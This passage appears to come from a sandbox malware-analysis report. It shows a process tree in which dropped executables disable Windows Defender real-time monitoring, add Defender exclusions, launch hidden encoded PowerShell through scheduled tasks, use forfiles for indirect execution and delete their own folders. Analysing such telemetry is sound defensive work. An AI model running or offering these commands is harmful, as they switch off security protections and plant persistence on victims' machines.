        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        
        PID:1780
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2492
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1500
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:328
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        10⤵
        
        PID:2952
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        Indirect Command Execution
        
        PID:2404
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bPUtwrklxNafuwbpPq" /SC once /ST 00:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe\" 0H /qdidn 385121 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:2604
- - C:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
    C:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:780
  - - C:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exe
      C:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2932
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1992
      - C:\ProgramData\EBAFBGIDHC.exe
        
        "C:\ProgramData\EBAFBGIDHC.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1640
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 92
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2732
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AKEBFCFIJJKK" & exit
        6⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:1396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 92
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1384
- - C:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exe
    C:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1480
- - C:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exe
    C:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:912
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2616

C:\Windows\system32\taskeng.exe
taskeng.exe {B62C6EA3-F399-4CB5-AE36-8C8696B46C4C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
PID:2436
- C:\Users\Admin\AppData\Local\Temp\service123.exe
  C:\Users\Admin\AppData\Local\Temp\/service123.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1940

C:\Windows\system32\taskeng.exe
taskeng.exe {A0523154-D89A-4175-9B8D-5A5F946E6A14} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2656
- C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe
  C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe 0H /qdidn 385121 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      Indirect Command Execution
      PID:2376
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1728
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1804
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      Indirect Command Execution
      System Location Discovery: System Language Discovery
      PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2940
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2996
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      Indirect Command Execution
      System Location Discovery: System Language Discovery
      PID:2184
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2480
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2000
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      Indirect Command Execution
      PID:1940
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3000
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1204
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      Indirect Command Execution
      PID:2072
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2692
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1216
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gDOmkEAdI" /SC once /ST 00:21:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2160
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gDOmkEAdI"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gDOmkEAdI"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2464
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2548
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1516
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "guOfrMzuU" /SC once /ST 00:19:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2624
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "guOfrMzuU"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "guOfrMzuU"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    - Indirect Command Execution
    PID:1104
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      System Location Discovery: System Language Discovery
      PID:2308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:484
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:576
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\ujfGTnqxDJAJlXPO\dVAxNtVU\eQgoxRKGTZiQbVVr.wsf"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2720
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\ujfGTnqxDJAJlXPO\dVAxNtVU\eQgoxRKGTZiQbVVr.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1568
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2000
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2136
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2492
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1100
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\skJyvfnXIyXU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\skJyvfnXIyXU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wCCFmxPIU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:900
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wCCFmxPIU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WitzacxcsoaTddVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2216
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WitzacxcsoaTddVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2772
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1584
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2820
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2712
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:3068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2152
  - - C:\Windows\SysWOW64\reg.exe
